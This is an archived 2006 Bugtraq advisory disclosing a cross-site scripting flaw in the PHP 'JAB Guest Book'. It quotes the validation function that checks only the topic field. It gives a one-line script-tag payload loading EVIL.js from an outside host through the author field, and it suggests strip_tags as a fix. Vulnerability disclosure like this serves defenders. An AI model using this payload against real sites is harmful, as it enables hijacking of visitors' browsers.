lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061204162037.1407.qmail@securityfocus.com>
Date: 4 Dec 2006 16:20:37 -0000
From: nj@...kerz.ir
To: bugtraq@...urityfocus.com
Subject: XSS in JAB Guest Book

Script Name: JAB Guest Book
Authors: Barnz@...mail.co.uk
Website: James Barnsley
Bug Report: NetJackal (nj[AT]hackerz[DOT]ir & nima_501[AT]yahoo[DOT]com)
Status: Patch not released
First i should apologize for my bad english.
Intro:
	JAB Guest Book is a free guest book written in PHP, it works using flat files 
to store data which means no database is needed. Features include easy installation
and customisation into your existing website. An administration panel which allows 
you to delete posts and ban users, additional administration configuration to un-ban
users and to use the bad word filter. Ability for users to post messages with topic,
email and comments including emotions (smilies). The main guest book works completely
using only one file.
Bugs Description:
	look at pbguestbook.php at line 425:
	
	 
	function invalideregtest($input)
		{
		$checkcount = 0;
		
		//$exinput = str_split($input);
		
		$countname = count($exinput);
	
		for($i=0; $i<$countname; $i++)
			{
			if(!ereg("[A-Za-z0-9]", $input[$i]) == 1)
				{
				$checkcount++;
				}
			}
	
		if($checkcount != 0)
			{
			$input = "no";
			}
		else
			{
			$input = "yes";
			}
	
		return($input);
		}
	$check1 = invalideregtest($topic);
	
	script just check $topic by invalideregtest function. so what's happen if we put some thing lile
<SCRIPT SRC=http://Hacler/EVIL.js></script> in $author? yes true answer xss happens

Solution:
	Edit the code and check other inputs by invalideregtest function or simply remove html tags by
strip_tags function (PHP built-in function)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ